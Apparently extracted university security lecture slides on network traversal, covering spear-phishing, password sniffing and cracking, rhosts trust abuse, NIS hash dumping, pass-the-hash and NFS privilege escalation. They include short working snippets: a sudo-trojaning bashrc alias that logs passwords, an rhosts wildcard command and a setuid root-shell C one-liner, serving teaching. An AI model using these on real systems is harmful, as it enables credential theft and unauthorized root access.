Introduction to Information Security Network Traversal nirkrako at post.tau.ac.il itamargi at post.tau.ac.il

Network Traversal - Introduction We now move from discussing the act of hacking a single machine or device, to discuss the act of traversing through an entire network: o How organized networks are structured. o How hackers penetrate organized networks, usually administered by a single person, or team of administrators. o How hackers traverse the network to gain access to more resources and data.

Victim Network Ve rti ca l Horizontal/Lateral

Patient 0 A hackers will try to infect one computer, by different methods: o Chance / statistical Luck! o Spear-phishing or human error. o Social engineering o Pure hacking. After infecting patient 0. Hackers can attempt to launch different types of attacks which can now depend on the internal network structure and support mechanisms. By using what information and access readily available on the hacked machine, hackers can attempt to laterally traverse the netwok.

Spearphishing “Spear phishing is an spoofing fraud attempt that targets a specific organization, seeking unauthorized access to confidential data. Spear phishing attempts are not typically initiated by "random hackers" but are more likely to be conducted by perpetrators out for financial gain, trade secrets or military information.” -- ar-phishing ar-phishing

An I received True story: I received this a few days ago. Can you spot the fail?

Network Users In an organized network, each user is given a single user/password credential, this password is used to authenticate the user against all machines in the network which the user should have access to. Example: TAU. Your user and password is used to login to the *n?x machines as well as the video website. If a computer used by one of the users is compromised. you can use his credentials if gained to login to all machines in the network.

Sniffing for passwords By local example.bashrc << __EOF__ alias ‘sudo’ ‘/tmp/sudo.sh’ __EOF__ /tmp/sudo.sh << __EOF__ #!/bin/bash echo “Enter password:” read PASS echo $PASS > /tmp/.password.log sudo $1 $2 $3 $4 $5 $6 __EOF__

Sniffing for passwords On windows and other GUI based applications: key logging is used to record credentials being entered. By actually sniffing the network, looking for “telnet” or other unencrypted communication ways – communication where passwords are given in clear text format. Sniffing the network traffic looking for hashes which can later be cracked (More in next slide).

Cracking passwords Gaining root access to /etc/shadow (previously /etc/passwd) leads to obtaining password hashes John the Ripper or other password brute forcing techniques can then be used to retrieve the clear text password. The clear text password can be used to login to other computers. Users tend to use the same password for all computers and services, making it easy to gain access to other resources.

rlogin/rsh - history Instead of logging in all the time – rlogin/rsh is used to authenticate a user without the need to enter a password. Once a connection is received from a trusted machine and it declares that the user remotely connecting is the user, the user automatically gains remote machine access with the same credentials. Many hacking techniques employ: o echo “+ +” > ~root/.rhosts o This lets anybody from any host connect to the computer. IP spoofing can be used to gain remote access as well. And this poor authentication is still being used in some dark corners of the world. NFS V < 4 has also utilizes the same bad authentication by only comparing host/port(using identd) to identify the user.

Domain of computers

Unix NIS (Network Information Service) The NIS (formerly known as Yellow Pages/YP) protocol is and old protocol used to sync passwords across a network. The NIS passwords are used to spread credential of a network of computers. From each of the servers in the network access is given to a virtual directory which contains files such as “passwd”/ “shadow”, etc. By using shell: # ypcat passwd o You can get the network hashes of ALL users! o In a secure network scheme this does not include the root account, however local account access can be gained on all computers sharing the passwd file.

Pass the hash Passing the hash is an original way of authentication for SSO (Single Sign On) which is easily exploitable. In windows based systems, by simply passing the hash, a user is able to proove that he has the credentials needed to gain access to a resource (such as a network share). Once hackers log in to a system, they can use locally existing network hashes to pass them to other systems by this process: o Gain local administrator privileges o View locally logged in accounts. o Impersonate a user locally. o Use regular windows operations to access network resources. o Gain more access and run remote code using psexec (sysinternals utility).

LSASS Slide was taking from “WCE Internals by Amplia Security”

Hash harvesting On windows computers, hashes are saved localy even after a logon session is terminated in case access to the domain is no longer available. Several tools are in the wild used to do this hash harvesting, such as: o WCE – Windows Credential Editor o Pass The Hash Toolkit. o gsecdump o Maybe more. o pwdump - hash dumping is also possible localy by dumping the SAM file (Security Accounts Manager) WCE and its like: o User ProcessReadMemory() to read the memory of LSASS for harvesting o Inject code to implement the impersonation of users. Side Note – cracking NTLM hashes: o NTLM aka NT LanMan (Lan Manager) hashes are DES based hashes of max 14 byte passwords: Each 7 bytes of the password is hashed seperately making it easier instead of 256^14 we get 256^7 * 2. Therefore a rainbow table can be easily created.

Unix NFS (Network File System) The Unix NFS comparable to windows “Sharing”. Is a method of sharing directories by allowing other to locally mount a remote directory as if it was their own. As we previously learned using u+s and o+x to a file that hands us root privileges we are able to escalate our privileges: o echo "main(){setuid(0);setgid(0);system("/bin/sh");}" > a.c o gcc –o a a.c Misconfigured NFS, allows mounted directory to contain suid files, therefore allowing root on one machine the ability to gain o

Shared binaries patching Administrators or users share binaries on network shares / NFS. (Usually installation files). If those network shares are writable by a hacker he can modify them and then wait for other users to execute them. Example at TAU: mount | grep '/ type' netapp1:/vol/vol0/linux-root/precise/common/ on / type nfs (rw,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nolock,proto=tcp,port=65535,timeo=70,retrans =3,sec=sys,local_lock=all,addr= )

Questions?